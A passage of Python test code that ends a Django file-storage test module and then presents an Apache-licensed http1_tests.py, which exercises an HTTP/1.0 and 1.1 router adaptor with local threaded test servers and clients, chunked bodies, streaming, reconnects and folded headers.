self.assertEqual(file_path.parent.parent.stat().st_mode & 0o777, expected_mode)
class FileStoragePathParsing(SimpleTestCase):
def setUp(self):
self.storage_dir = tempfile.mkdtemp()
self.storage = FileSystemStorage(self.storage_dir)
def tearDown(self):
shutil.rmtree(self.storage_dir)
def test_directory_with_dot(self):
"""Regression test for #9610.
If the directory name contains a dot and the file name doesn't, make
sure we still mangle the file name instead of the directory name.
"""
self.storage.save('dotted.path/test', ContentFile("1"))
self.storage.save('dotted.path/test', ContentFile("2"))
files = sorted(os.listdir(os.path.join(self.storage_dir, 'dotted.path')))
self.assertFalse(os.path.exists(os.path.join(self.storage_dir, 'dotted_.path')))
self.assertEqual(files[0], 'test')
self.assertRegex(files[1], 'test_%s' % FILE_SUFFIX_REGEX)
def test_first_character_dot(self):
"""
File names with a dot as their first character don't have an extension,
and the underscore should get added to the end.
"""
self.storage.save('dotted.path/.test', ContentFile("1"))
self.storage.save('dotted.path/.test', ContentFile("2"))
files = sorted(os.listdir(os.path.join(self.storage_dir, 'dotted.path')))
self.assertFalse(os.path.exists(os.path.join(self.storage_dir, 'dotted_.path')))
self.assertEqual(files[0], '.test')
self.assertRegex(files[1], '.test_%s' % FILE_SUFFIX_REGEX)
class ContentFileStorageTestCase(unittest.TestCase):
def setUp(self):
self.storage_dir = tempfile.mkdtemp()
self.storage = FileSystemStorage(self.storage_dir)
def tearDown(self):
shutil.rmtree(self.storage_dir)
def test_content_saving(self):
"""
ContentFile can be saved correctly with the filesystem storage,
if it was initialized with either bytes or unicode content.
"""
self.storage.save('bytes.txt', ContentFile(b"content"))
self.storage.save('unicode.txt', ContentFile("español"))
@override_settings(ROOT_URLCONF='file_storage.urls')
class FileLikeObjectTestCase(LiveServerTestCase):
"""
Test file-like objects (#15644).
"""
available_apps = []
def setUp(self):
self.temp_dir = tempfile.mkdtemp()
self.storage = FileSystemStorage(location=self.temp_dir)
def tearDown(self):
shutil.rmtree(self.temp_dir)
def test_urllib_request_urlopen(self):
"""
Test the File storage API with a file-like object coming from
urllib.request.urlopen().
"""
file_like_object = urlopen(self.live_server_url + '/')
f = File(file_like_object)
stored_filename = self.storage.save("remote_file.html", f)
remote_file = urlopen(self.live_server_url + '/')
with self.storage.open(stored_filename) as stored_file:
self.assertEqual(stored_file.read(), remote_file.read())
|
http1_tests.py
|
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
#
import socket
import uuid
from threading import Thread
from time import sleep
try:
from http.server import HTTPServer, BaseHTTPRequestHandler
from http.client import HTTPConnection
from http.client import HTTPException
except ImportError:
from BaseHTTPServer import HTTPServer, BaseHTTPRequestHandler
from httplib import HTTPConnection, HTTPException
from system_test import TestCase, TIMEOUT, Logger, Qdrouterd
class RequestHandler(BaseHTTPRequestHandler):
"""
Dispatches requests received by the HTTPServer based on the method
"""
protocol_version = 'HTTP/1.1'
def _execute_request(self, tests):
for req, resp, val in tests:
if req.target == self.path:
xhdrs = None
if "test-echo" in self.headers:
xhdrs = {"test-echo":
self.headers["test-echo"]}
self._consume_body()
if not isinstance(resp, list):
resp = [resp]
for r in resp:
r.send_response(self, extra_headers=xhdrs)
self.server.request_count += 1
return
self.send_error(404, "Not Found")
def do_GET(self):
self._execute_request(self.server.system_tests["GET"])
def do_HEAD(self):
self._execute_request(self.server.system_tests["HEAD"])
def do_POST(self):
if self.path == "/SHUTDOWN":
self.send_response(200, "OK")
self.send_header("Content-Length", "13")
self.end_headers()
self.wfile.write(b'Server Closed')
self.wfile.flush()
self.close_connection = True
self.server.server_killed = True
return
self._execute_request(self.server.system_tests["POST"])
def do_PUT(self):
self._execute_request(self.server.system_tests["PUT"])
# these overrides just quiet the test output
# comment them out to help debug:
def log_request(self, code=None, size=None):
pass
def log_message(self, format=None, *args):
pass
def _consume_body(self):
"""
Read the entire body off the rfile. This must be done to allow
multiple requests on the same socket
"""
if self.command == 'HEAD':
return b''
for key, value in self.headers.items():
if key.lower() == 'content-length':
return self.rfile.read(int(value))
if key.lower() == 'transfer-encoding' \
and 'chunked' in value.lower():
body = b''
while True:
header = self.rfile.readline().strip().split(b';')[0]
hlen = int(header, base=16)
if hlen > 0:
data = self.rfile.read(hlen + 2) # 2 = \r\n
body += data[:-2]
else:
self.rfile.readline() # discard last \r\n
break
return body
return self.rfile.read()
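# Comment-only example of the chunked-body path in _consume_body() above: with
# "Transfer-Encoding: chunked", hex-length-prefixed pieces are read until the
# zero-length terminator, e.g. an rfile containing
#   b"5\r\nhello\r\n0\r\n\r\n"
# is returned as b"hello".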
class RequestHandler10(RequestHandler):
"""
RequestHandler that forces the server to use HTTP version 1.0 semantics
"""
protocol_version = 'HTTP/1.0'
class MyHTTPServer(HTTPServer):
"""
Adds a switch to the HTTPServer to allow it to exit gracefully
"""
def __init__(self, addr, handler_cls, testcases):
self.system_tests = testcases
self.request_count = 0
HTTPServer.__init__(self, addr, handler_cls)
def server_close(self):
try:
# force immediate close of listening socket
self.socket.shutdown(socket.SHUT_RDWR)
except Exception:
pass
HTTPServer.server_close(self)
class ThreadedTestClient(object):
"""
An HTTP client running in a separate thread
"""
def __init__(self, tests, port, repeat=1):
self._id = uuid.uuid4().hex
self._conn_addr = ("127.0.0.1:%s" % port)
self._tests = tests
self._repeat = repeat
self._logger = Logger(title="TestClient: %s" % self._id,
print_to_console=False)
self._thread = Thread(target=self._run)
self._thread.daemon = True
self.error = None
self.count = 0
self._thread.start()
def _run(self):
self._logger.log("TestClient connecting on %s" % self._conn_addr)
client = HTTPConnection(self._conn_addr, timeout=TIMEOUT)
self._logger.log("TestClient connected")
for loop in range(self._repeat):
self._logger.log("TestClient start request %d" % loop)
for op, tests in self._tests.items():
for req, _, val in tests:
self._logger.log("TestClient sending %s %s request" % (op, req.target))
req.send_request(client,
{"test-echo": "%s-%s-%s-%s" % (self._id,
loop,
op,
req.target)})
self._logger.log("TestClient getting %s response" % op)
try:
rsp = client.getresponse()
except HTTPException as exc:
self._logger.log("TestClient response failed: %s" % exc)
self.error = str(exc)
return
self._logger.log("TestClient response %s received" % op)
if val:
try:
body = val.check_response(rsp)
except Exception as exc:
self._logger.log("TestClient response invalid: %s"
% str(exc))
self.error = "client failed: %s" % str(exc)
return
if req.method == "BODY" and body != b'':
self._logger.log("TestClient response invalid: %s"
% "body present!")
self.error = "error: body present!"
return
self.count += 1
self._logger.log("TestClient request %s %s completed!" %
(op, req.target))
client.close()
self._logger.log("TestClient to %s closed" % self._conn_addr)
    def wait(self, timeout=TIMEOUT):
        self._thread.join(timeout=timeout)
        self._logger.log("TestClient %s shut down" % self._conn_addr)
        sleep(0.5)  # fudge factor to allow socket close to complete
def dump_log(self):
self._logger.dump()
class TestServer(object):
"""
    An HTTPServer running in a separate thread
"""
def __init__(self, server_port, client_port, tests, handler_cls=None):
self._logger = Logger(title="TestServer", print_to_console=False)
self._client_port = client_port
self._server_addr = ("", server_port)
self._server = MyHTTPServer(self._server_addr,
handler_cls or RequestHandler,
tests)
self._server.allow_reuse_address = True
self._thread = Thread(target=self._run)
self._thread.daemon = True
self._thread.start()
def _run(self):
self._logger.log("TestServer listening on %s:%s" % self._server_addr)
try:
self._server.server_killed = False
while not self._server.server_killed:
self._server.handle_request()
except Exception as exc:
self._logger.log("TestServer %s crash: %s" %
(self._server_addr, exc))
raise
self._logger.log("TestServer %s:%s closed" % self._server_addr)
def wait(self, timeout=TIMEOUT):
self._logger.log("TestServer %s:%s shutting down" % self._server_addr)
self.request_count = 0
if self._thread.is_alive():
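            # POST /SHUTDOWN is handled by do_POST(), which sets server_killed
            # so the handle_request() loop in _run() exits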
client = HTTPConnection("127.0.0.1:%s" % self._client_port,
timeout=TIMEOUT)
client.putrequest("POST", "/SHUTDOWN")
client.putheader("Content-Length", "0")
client.endheaders()
# 13 == len('Server Closed')
client.getresponse().read(13)
client.close()
        self._thread.join(timeout=timeout)
if self._server:
self._server.server_close()
self.request_count = self._server.request_count
del self._server
        sleep(0.5)  # fudge factor to allow socket close to complete
def http1_ping(sport, cport):
"""
Test the HTTP path by doing a simple GET request
"""
TEST = {
"GET": [
(RequestMsg("GET", "/GET/ping",
headers={"Content-Length": 0}),
ResponseMsg(200, reason="OK",
headers={"Content-Length": 4,
"Content-Type": "text/plain;charset=utf-8"},
body=b'pong'),
ResponseValidator(expect_body=b'pong'))
]
}
server = TestServer(server_port=sport,
client_port=cport,
tests=TEST)
client = ThreadedTestClient(tests=TEST, port=cport)
client.wait()
server.wait()
return (client.count, client.error)
class ResponseMsg(object):
"""
A 'hardcoded' HTTP response message. This class writes its response
message when called by the HTTPServer via the BaseHTTPRequestHandler
"""
def __init__(self, status, version=None, reason=None,
headers=None, body=None, error=False):
self.status = status
self.version = version or "HTTP/1.1"
self.reason = reason
self.headers = headers or {}
self.body = body
self.error = error
def send_response(self, handler, extra_headers=None):
extra_headers = extra_headers or {}
if self.error:
handler.send_error(self.status,
message=self.reason)
return
handler.send_response(self.status, self.reason)
for key, value in self.headers.items():
handler.send_header(key, value)
for key, value in extra_headers.items():
handler.send_header(key, value)
handler.end_headers()
if self.body:
handler.wfile.write(self.body)
handler.wfile.flush()
class RequestMsg(object):
"""
A 'hardcoded' HTTP request message. This class writes its request
message to the HTTPConnection.
"""
def __init__(self, method, target, headers=None, body=None):
self.method = method
self.target = target
self.headers = headers or {}
self.body = body
def send_request(self, conn, extra_headers=None):
extra_headers = extra_headers or {}
conn.putrequest(self.method, self.target)
for key, value in self.headers.items():
conn.putheader(key, value)
for key, value in extra_headers.items():
conn.putheader(key, value)
conn.endheaders()
if self.body:
conn.send(self.body)
class ResponseValidator(object):
"""
Validate a response as received by the HTTP client
"""
def __init__(self, status=200, expect_headers=None, expect_body=None):
if expect_headers is None:
expect_headers = {}
self.status = status
self.expect_headers = expect_headers
self.expect_body = expect_body
def check_response(self, rsp):
if self.status and rsp.status != self.status:
raise Exception("Bad response code, expected %s got %s"
% (self.status, rsp.status))
for key, value in self.expect_headers.items():
if rsp.getheader(key) != value:
raise Exception("Missing/bad header (%s), expected %s got %s"
% (key, value, rsp.getheader(key)))
body = rsp.read()
if (self.expect_body and self.expect_body != body):
raise Exception("Bad response body expected %s got %s"
% (self.expect_body, body))
return body
class CommonHttp1Edge2EdgeTest(object):
def test_01_concurrent_requests(self):
"""
Test multiple concurrent clients sending streaming messages
"""
REQ_CT = 3 # 3 requests per TEST_*
TESTS_11 = {
"PUT": [
(RequestMsg("PUT", "/PUT/test_01_concurrent_requests_11",
headers={
"Transfer-encoding": "chunked",
"Content-Type": "text/plain;charset=utf-8"
},
# ~384K to trigger Q2
body=b'20000\r\n' + b'1' * 0x20000 + b'\r\n'
+ b'20000\r\n' + b'2' * 0x20000 + b'\r\n'
+ b'20000\r\n' + b'3' * 0x20000 + b'\r\n'
+ b'13\r\nEND OF TRANSMISSION\r\n'
+ b'0\r\n\r\n'),
ResponseMsg(201, reason="Created",
headers={"Test-Header": "/PUT/test_01_concurrent_requests_11",
"Content-Length": "0"}),
ResponseValidator(status=201)
)],
"GET": [
(RequestMsg("GET", "/GET/test_01_concurrent_requests_11_small",
headers={"Content-Length": "000"}),
ResponseMsg(200, reason="OK",
headers={
"Content-Length": "19",
"Content-Type": "text/plain;charset=utf-8",
"Test-Header": "/GET/test_01_concurrent_requests_11_small"
},
body=b'END OF TRANSMISSION'),
ResponseValidator(status=200)),
(RequestMsg("GET", "/GET/test_01_concurrent_requests_11",
headers={"Content-Length": "000"}),
ResponseMsg(200, reason="OK",
headers={
"transfer-Encoding": "chunked",
"Content-Type": "text/plain;charset=utf-8",
"Test-Header": "/GET/test_01_concurrent_requests_11"
},
# ~384K to trigger Q2
body=b'20000\r\n' + b'1' * 0x20000 + b'\r\n'
+ b'20000\r\n' + b'2' * 0x20000 + b'\r\n'
+ b'20000\r\n' + b'3' * 0x20000 + b'\r\n'
+ b'13\r\nEND OF TRANSMISSION\r\n'
+ b'0\r\n\r\n'),
ResponseValidator(status=200)
)],
}
TESTS_10 = {
"POST": [
(RequestMsg("POST", "/POST/test_01_concurrent_requests_10",
headers={"Content-Type": "text/plain;charset=utf-8",
"Content-Length": "393216"},
body=b'P' * 393197
+ b'END OF TRANSMISSION'),
ResponseMsg(201, reason="Created",
headers={"Test-Header": "/POST/test_01_concurrent_requests_10",
"Content-Length": "0"}),
ResponseValidator(status=201)
)],
"GET": [
(RequestMsg("GET", "/GET/test_01_concurrent_requests_10_small",
headers={"Content-Length": "000"}),
ResponseMsg(200, reason="OK",
# no content-length, server must close conn when done
headers={"Test-Header": "/GET/test_01_concurrent_requests_10_small",
"Content-Type": "text/plain;charset=utf-8"},
body=b'END OF TRANSMISSION'),
ResponseValidator(status=200)),
(RequestMsg("GET", "/GET/test_01_concurrent_requests_10",
headers={"Content-Length": "000"}),
ResponseMsg(200, reason="OK",
headers={"Test-Header": "/GET/test_01_concurrent_requests_10",
"Content-Length": "393215",
"Content-Type": "text/plain;charset=utf-8"},
body=b'G' * 393196
+ b'END OF TRANSMISSION'),
ResponseValidator(status=200)
)],
}
server11 = TestServer(server_port=self.http_server11_port,
client_port=self.http_listener11_port,
tests=TESTS_11)
server10 = TestServer(server_port=self.http_server10_port,
client_port=self.http_listener10_port,
tests=TESTS_10,
handler_cls=RequestHandler10)
self.EA2.wait_connectors()
repeat_ct = 10
client_ct = 4 # per version
clients = []
for _ in range(client_ct):
clients.append(ThreadedTestClient(TESTS_11,
self.http_listener11_port,
repeat=repeat_ct))
clients.append(ThreadedTestClient(TESTS_10,
self.http_listener10_port,
repeat=repeat_ct))
for client in clients:
client.wait()
try:
self.assertIsNone(client.error)
self.assertEqual(repeat_ct * REQ_CT, client.count)
except Exception:
client.dump_log()
raise
server11.wait()
self.assertEqual(client_ct * repeat_ct * REQ_CT,
server11.request_count)
server10.wait()
self.assertEqual(client_ct * repeat_ct * REQ_CT,
server10.request_count)
def test_02_credit_replenish(self):
"""
        Verify credit is replenished by sending more requests than the default
        credit window (250) across the routers.
"""
TESTS = {
"GET": [
(RequestMsg("GET", "/GET/test_02_credit_replenish",
headers={"Content-Length": "000"}),
ResponseMsg(200, reason="OK",
headers={"Content-Length": "24",
"Content-Type": "text/plain;charset=utf-8"},
body=b'test_02_credit_replenish'),
ResponseValidator(status=200),
),
]
}
server = TestServer(server_port=self.http_server11_port,
client_port=self.http_listener11_port,
tests=TESTS)
self.EA2.wait_connectors()
client = ThreadedTestClient(TESTS,
self.http_listener11_port,
repeat=300)
client.wait()
self.assertIsNone(client.error)
self.assertEqual(300, client.count)
server.wait()
def test_03_server_reconnect(self):
"""
Verify server reconnect logic.
"""
TESTS = {
"GET": [
(RequestMsg("GET", "/GET/test_03_server_reconnect",
headers={"Content-Length": "000"}),
ResponseMsg(200, reason="OK",
headers={"Content-Length": "24",
"Content-Type": "text/plain;charset=utf-8"},
body=b'test_03_server_reconnect'),
ResponseValidator(status=200),
),
]
}
# bring up the server and send some requests. This will cause the
# router to grant credit for clients
server = TestServer(server_port=self.http_server11_port,
client_port=self.http_listener11_port,
tests=TESTS)
self.EA2.wait_connectors()
client = ThreadedTestClient(TESTS,
self.http_listener11_port,
repeat=2)
client.wait()
self.assertIsNone(client.error)
self.assertEqual(2, client.count)
        # simulate server loss. Fire up a client which should be granted
        # credit since the adaptor does not immediately tear down the server
        # links. This will cause the adaptor to run qdr_connection_process
        # without a raw connection available to wake the I/O thread.
server.wait()
client = ThreadedTestClient(TESTS,
self.http_listener11_port,
repeat=2)
# the adaptor will detach the links to the server if the connection
# cannot be reestablished after 2.5 seconds. Restart the server before
        # that occurs to prevent client messages from being released with 503
# status.
server = TestServer(server_port=self.http_server11_port,
client_port=self.http_listener11_port,
tests=TESTS)
client.wait()
self.assertIsNone(client.error)
self.assertEqual(2, client.count)
server.wait()
def test_04_server_pining_for_the_fjords(self):
"""
Test permanent loss of server
"""
TESTS = {
"GET": [
(RequestMsg("GET", "/GET/test_04_fjord_pining",
headers={"Content-Length": "000"}),
ResponseMsg(200, reason="OK",
headers={"Content-Length": "20",
"Content-Type": "text/plain;charset=utf-8"},
body=b'test_04_fjord_pining'),
ResponseValidator(status=200),
),
]
}
# bring up the server and send some requests. This will cause the
# router to grant credit for clients
server = TestServer(server_port=self.http_server11_port,
client_port=self.http_listener11_port,
tests=TESTS)
self.EA2.wait_connectors()
client = ThreadedTestClient(TESTS, self.http_listener11_port)
client.wait()
self.assertIsNone(client.error)
self.assertEqual(1, client.count)
TESTS_FAIL = {
"GET": [
(RequestMsg("GET", "/GET/test_04_fjord_pining",
headers={"Content-Length": "000"}),
ResponseMsg(200, reason="OK",
headers={"Content-Length": "20",
"Content-Type": "text/plain;charset=utf-8"},
body=b'test_04_fjord_pining'),
ResponseValidator(status=503),
),
]
}
# Kill the server then issue client requests. These requests will be
# held on the server's outgoing links until they expire (2.5 seconds).
# At that point the client will receive a 503 response.
server.wait()
client = ThreadedTestClient(TESTS_FAIL, self.http_listener11_port)
client.wait()
self.assertIsNone(client.error)
self.assertEqual(1, client.count)
# ensure links recover once the server re-appears
server = TestServer(server_port=self.http_server11_port,
client_port=self.http_listener11_port,
tests=TESTS)
self.EA2.wait_connectors()
client = ThreadedTestClient(TESTS, self.http_listener11_port)
client.wait()
self.assertIsNone(client.error)
self.assertEqual(1, client.count)
server.wait()
def test_05_large_streaming_msg(self):
"""
Verify large streaming message transfer
"""
TESTS_11 = {
"PUT": [
(RequestMsg("PUT", "/PUT/streaming_test_11",
headers={
"Transfer-encoding": "chunked",
"Content-Type": "text/plain;charset=utf-8"
},
# 4 chunks each ~= 600K
body=b'927C1\r\n' + b'0' * 0x927C0 + b'X\r\n'
+ b'927C0\r\n' + b'1' * 0x927C0 + b'\r\n'
+ b'927C1\r\n' + b'2' * 0x927C0 + b'X\r\n'
+ b'927C0\r\n' + b'3' * 0x927C0 + b'\r\n'
+ b'0\r\n\r\n'),
ResponseMsg(201, reason="Created",
headers={"Response-Header": "data",
"Content-Length": "0"}),
ResponseValidator(status=201))
],
"GET": [
(RequestMsg("GET", "/GET/streaming_test_11",
headers={"Content-Length": "000"}),
ResponseMsg(200, reason="OK",
headers={
"transfer-Encoding": "chunked",
"Content-Type": "text/plain;charset=utf-8"
},
                         # two ~1.2MB chunks
body=b'124f80\r\n' + b'4' * 0x124F80 + b'\r\n'
+ b'124f80\r\n' + b'5' * 0x124F80 + b'\r\n'
+ b'0\r\n\r\n'),
ResponseValidator(status=200))
],
}
TESTS_10 = {
"POST": [
(RequestMsg("POST", "/POST/streaming_test_10",
headers={"Header-1": "H" * 2048,
"Content-Length": "2097155",
"Content-Type": "text/plain;charset=utf-8"},
body=b'P' * 2097155),
ResponseMsg(201, reason="Created",
headers={"Response-Header": "data",
"Content-Length": "0"}),
ResponseValidator(status=201))
],
"GET": [
(RequestMsg("GET", "/GET/streaming_test_10",
headers={"Content-Length": "000"}),
ResponseMsg(200, reason="OK",
headers={"Content-Length": "1999999",
"Content-Type": "text/plain;charset=utf-8"},
body=b'G' * 1999999),
ResponseValidator(status=200))
],
}
server11 = TestServer(server_port=self.http_server11_port,
client_port=self.http_listener11_port,
tests=TESTS_11)
server10 = TestServer(server_port=self.http_server10_port,
client_port=self.http_listener10_port,
tests=TESTS_10,
handler_cls=RequestHandler10)
self.EA2.wait_connectors()
client11 = ThreadedTestClient(TESTS_11,
self.http_listener11_port,
repeat=2)
client11.wait()
self.assertIsNone(client11.error)
self.assertEqual(4, client11.count)
client10 = ThreadedTestClient(TESTS_10,
self.http_listener10_port,
repeat=2)
client10.wait()
self.assertIsNone(client10.error)
self.assertEqual(4, client10.count)
server11.wait()
server10.wait()
class CommonHttp1OneRouterTest(object):
TESTS_11 = {
#
# GET
#
"GET": [
(RequestMsg("GET", "/GET/error",
headers={"Content-Length": 0}),
ResponseMsg(400, reason="Bad breath", error=True),
ResponseValidator(status=400)),
(RequestMsg("GET", "/GET/no_content",
headers={"Content-Length": 0}),
ResponseMsg(204, reason="No Content"),
ResponseValidator(status=204)),
(RequestMsg("GET", "/GET/content_len",
headers={"Content-Length": "00"}),
ResponseMsg(200, reason="OK",
headers={"Content-Length": 1,
"Content-Type": "text/plain;charset=utf-8"},
body=b'?'),
ResponseValidator(expect_headers={'Content-Length': '1'},
expect_body=b'?')),
(RequestMsg("GET", "/GET/content_len_511",
headers={"Content-Length": 0}),
ResponseMsg(200, reason="OK",
headers={"Content-Length": 511,
"Content-Type": "text/plain;charset=utf-8"},
body=b'X' * 511),
ResponseValidator(expect_headers={'Content-Length': '511'},
expect_body=b'X' * 511)),
(RequestMsg("GET", "/GET/content_len_4096",
headers={"Content-Length": 0}),
ResponseMsg(200, reason="OK",
headers={"Content-Length": 4096,
"Content-Type": "text/plain;charset=utf-8"},
body=b'X' * 4096),
ResponseValidator(expect_headers={'Content-Length': '4096'},
expect_body=b'X' * 4096)),
(RequestMsg("GET", "/GET/chunked",
headers={"Content-Length": 0}),
ResponseMsg(200, reason="OK",
headers={"transfer-encoding": "chunked",
"Content-Type": "text/plain;charset=utf-8"},
# note: the chunk length does not count the trailing CRLF
body=b'16\r\n'
+ b'Mary had a little pug \r\n'
+ b'1b\r\n'
+ b'Its name was "Skupper-Jack"\r\n'
+ b'0\r\n'
+ b'Optional: Trailer\r\n'
+ b'Optional: Trailer\r\n'
+ b'\r\n'),
ResponseValidator(expect_headers={'transfer-encoding': 'chunked'},
expect_body=b'Mary had a little pug Its name was "Skupper-Jack"')),
(RequestMsg("GET", "/GET/chunked_large",
headers={"Content-Length": 0}),
ResponseMsg(200, reason="OK",
headers={"transfer-encoding": "chunked",
"Content-Type": "text/plain;charset=utf-8"},
# note: the chunk length does not count the trailing CRLF
body=b'1\r\n'
+ b'?\r\n'
+ b'800\r\n'
+ b'X' * 0x800 + b'\r\n'
+ b'13\r\n'
+ b'Y' * 0x13 + b'\r\n'
+ b'0\r\n'
+ b'Optional: Trailer\r\n'
+ b'Optional: Trailer\r\n'
+ b'\r\n'),
ResponseValidator(expect_headers={'transfer-encoding': 'chunked'},
expect_body=b'?' + b'X' * 0x800 + b'Y' * 0x13)),
(RequestMsg("GET", "/GET/info_content_len",
headers={"Content-Length": 0}),
[ResponseMsg(100, reason="Continue",
headers={"Blab": 1, "Blob": "?"}),
ResponseMsg(200, reason="OK",
headers={"Content-Length": 1,
"Content-Type": "text/plain;charset=utf-8"},
body=b'?')],
ResponseValidator(expect_headers={'Content-Type': "text/plain;charset=utf-8"},
expect_body=b'?')),
# (RequestMsg("GET", "/GET/no_length",
# headers={"Content-Length": "0"}),
# ResponseMsg(200, reason="OK",
# headers={"Content-Type": "text/plain;charset=utf-8",
# "connection": "close"
# },
# body=b'Hi! ' * 1024 + b'X'),
# ResponseValidator(expect_body=b'Hi! ' * 1024 + b'X')),
],
#
# HEAD
#
"HEAD": [
(RequestMsg("HEAD", "/HEAD/test_01",
headers={"Content-Length": "0"}),
ResponseMsg(200, headers={"App-Header-1": "Value 01",
"Content-Length": "10",
"App-Header-2": "Value 02"},
body=None),
ResponseValidator(expect_headers={"App-Header-1": "Value 01",
"Content-Length": "10",
"App-Header-2": "Value 02"})
),
(RequestMsg("HEAD", "/HEAD/test_02",
headers={"Content-Length": "0"}),
ResponseMsg(200, headers={"App-Header-1": "Value 01",
"Transfer-Encoding": "chunked",
"App-Header-2": "Value 02"}),
ResponseValidator(expect_headers={"App-Header-1": "Value 01",
"Transfer-Encoding": "chunked",
"App-Header-2": "Value 02"})),
(RequestMsg("HEAD", "/HEAD/test_03",
headers={"Content-Length": "0"}),
ResponseMsg(200, headers={"App-Header-3": "Value 03"}),
ResponseValidator(expect_headers={"App-Header-3": "Value 03"})),
],
#
# POST
#
"POST": [
(RequestMsg("POST", "/POST/test_01",
headers={"App-Header-1": "Value 01",
"Content-Length": "19",
"Content-Type": "application/x-www-form-urlencoded"},
body=b'one=1&two=2&three=3'),
ResponseMsg(200, reason="OK",
headers={"Response-Header": "whatever",
"Transfer-Encoding": "chunked"},
body=b'8\r\n'
+ b'12345678\r\n'
+ b'f\r\n'
+ b'abcdefghijklmno\r\n'
+ b'000\r\n'
+ b'\r\n'),
ResponseValidator(expect_body=b'12345678abcdefghijklmno')
),
(RequestMsg("POST", "/POST/test_02",
headers={"App-Header-1": "Value 01",
"Transfer-Encoding": "chunked"},
body=b'01\r\n'
+ b'!\r\n'
+ b'0\r\n\r\n'),
ResponseMsg(200, reason="OK",
headers={"Response-Header": "whatever",
"Content-Length": "9"},
body=b'Hi There!'),
ResponseValidator(expect_body=b'Hi There!')
),
],
#
# PUT
#
"PUT": [
(RequestMsg("PUT", "/PUT/test_01",
headers={"Put-Header-1": "Value 01",
"Transfer-Encoding": "chunked",
"Content-Type": "text/plain;charset=utf-8"},
body=b'80\r\n'
+ b'$' * 0x80 + b'\r\n'
+ b'0\r\n\r\n'),
ResponseMsg(201, reason="Created",
headers={"Response-Header": "whatever",
"Content-length": "3"},
body=b'ABC'),
ResponseValidator(status=201, expect_body=b'ABC')
),
(RequestMsg("PUT", "/PUT/test_02",
headers={"Put-Header-1": "Value 01",
"Content-length": "0",
"Content-Type": "text/plain;charset=utf-8"}),
ResponseMsg(201, reason="Created",
headers={"Response-Header": "whatever",
"Transfer-Encoding": "chunked"},
body=b'1\r\n$\r\n0\r\n\r\n'),
ResponseValidator(status=201, expect_body=b'$')
),
]
}
# HTTP/1.0 compliant test cases (no chunked, response length unspecified)
TESTS_10 = {
#
# GET
#
"GET": [
(RequestMsg("GET", "/GET/error",
headers={"Content-Length": 0}),
ResponseMsg(400, reason="Bad breath", error=True),
ResponseValidator(status=400)),
(RequestMsg("GET", "/GET/no_content",
headers={"Content-Length": 0}),
ResponseMsg(204, reason="No Content"),
ResponseValidator(status=204)),
(RequestMsg("GET", "/GET/content_len_511",
headers={"Content-Length": 0}),
ResponseMsg(200, reason="OK",
headers={"Content-Length": 511,
"Content-Type": "text/plain;charset=utf-8"},
body=b'X' * 511),
ResponseValidator(expect_headers={'Content-Length': '511'},
expect_body=b'X' * 511)),
(RequestMsg("GET", "/GET/content_len_4096",
headers={"Content-Length": 0}),
ResponseMsg(200, reason="OK",
headers={"Content-Type": "text/plain;charset=utf-8"},
body=b'X' * 4096),
ResponseValidator(expect_headers={"Content-Type": "text/plain;charset=utf-8"},
expect_body=b'X' * 4096)),
(RequestMsg("GET", "/GET/info_content_len",
headers={"Content-Length": 0}),
ResponseMsg(200, reason="OK",
headers={"Content-Type": "text/plain;charset=utf-8"},
body=b'?'),
ResponseValidator(expect_headers={'Content-Type': "text/plain;charset=utf-8"},
expect_body=b'?')),
# test support for "folded headers"
(RequestMsg("GET", "/GET/folded_header_01",
headers={"Content-Length": 0}),
ResponseMsg(200, reason="OK",
headers={"Content-Type": "text/plain;charset=utf-8",
"Content-Length": 1,
"folded-header": "One\r\n \r\n\tTwo"},
body=b'X'),
ResponseValidator(expect_headers={"Content-Type":
"text/plain;charset=utf-8",
"folded-header":
"One \tTwo"},
expect_body=b'X')),
(RequestMsg("GET", "/GET/folded_header_02",
headers={"Content-Length": 0}),
ResponseMsg(200, reason="OK",
headers={"Content-Type": "text/plain;charset=utf-8",
"Content-Length": 1,
"folded-header": "\r\n \r\n\tTwo",
"another-header": "three"},
body=b'X'),
ResponseValidator(expect_headers={"Content-Type":
"text/plain;charset=utf-8",
# trim leading and
# trailing ws:
"folded-header":
"Two",
"another-header":
"three"},
expect_body=b'X')),
],
#
# HEAD
#
"HEAD": [
(RequestMsg("HEAD", "/HEAD/test_01",
headers={"Content-Length": "0"}),
ResponseMsg(200, headers={"App-Header-1": "Value 01",
"Content-Length": "10",
"App-Header-2": "Value 02"},
body=None),
ResponseValidator(expect_headers={"App-Header-1": "Value 01",
"Content-Length": "10",
"App-Header-2": "Value 02"})
),
(RequestMsg("HEAD", "/HEAD/test_03",
headers={"Content-Length": "0"}),
ResponseMsg(200, headers={"App-Header-3": "Value 03"}),
ResponseValidator(expect_headers={"App-Header-3": "Value 03"})),
],
#
# POST
#
"POST": [
(RequestMsg("POST", "/POST/test_01",
headers={"App-Header-1": "Value 01",
"Content-Length": "19",
"Content-Type": "application/x-www-form-urlencoded"},
body=b'one=1&two=2&three=3'),
ResponseMsg(200, reason="OK",
headers={"Response-Header": "whatever"},
body=b'12345678abcdefghijklmno'),
ResponseValidator(expect_body=b'12345678abcdefghijklmno')
),
(RequestMsg("POST", "/POST/test_02",
headers={"App-Header-1": "Value 01",
"Content-Length": "5"},
body=b'01234'),
ResponseMsg(200, reason="OK",
headers={"Response-Header": "whatever",
"Content-Length": "9"},
body=b'Hi There!'),
ResponseValidator(expect_body=b'Hi There!')
),
],
#
# PUT
#
"PUT": [
(RequestMsg("PUT", "/PUT/test_01",
headers={"Put-Header-1": "Value 01",
"Content-Length": "513",
"Content-Type": "text/plain;charset=utf-8"},
body=b'$' * 513),
ResponseMsg(201, reason="Created",
headers={"Response-Header": "whatever",
"Content-length": "3"},
body=b'ABC'),
ResponseValidator(status=201, expect_body=b'ABC')
),
(RequestMsg("PUT", "/PUT/test_02",
headers={"Put-Header-1": "Value 01",
"Content-length": "0",
"Content-Type": "text/plain;charset=utf-8"}),
ResponseMsg(201, reason="Created",
headers={"Response-Header": "whatever"},
body=b'No Content Length'),
ResponseValidator(status=201, expect_body=b'No Content Length')
),
]
}
def _do_request(self, client, tests):
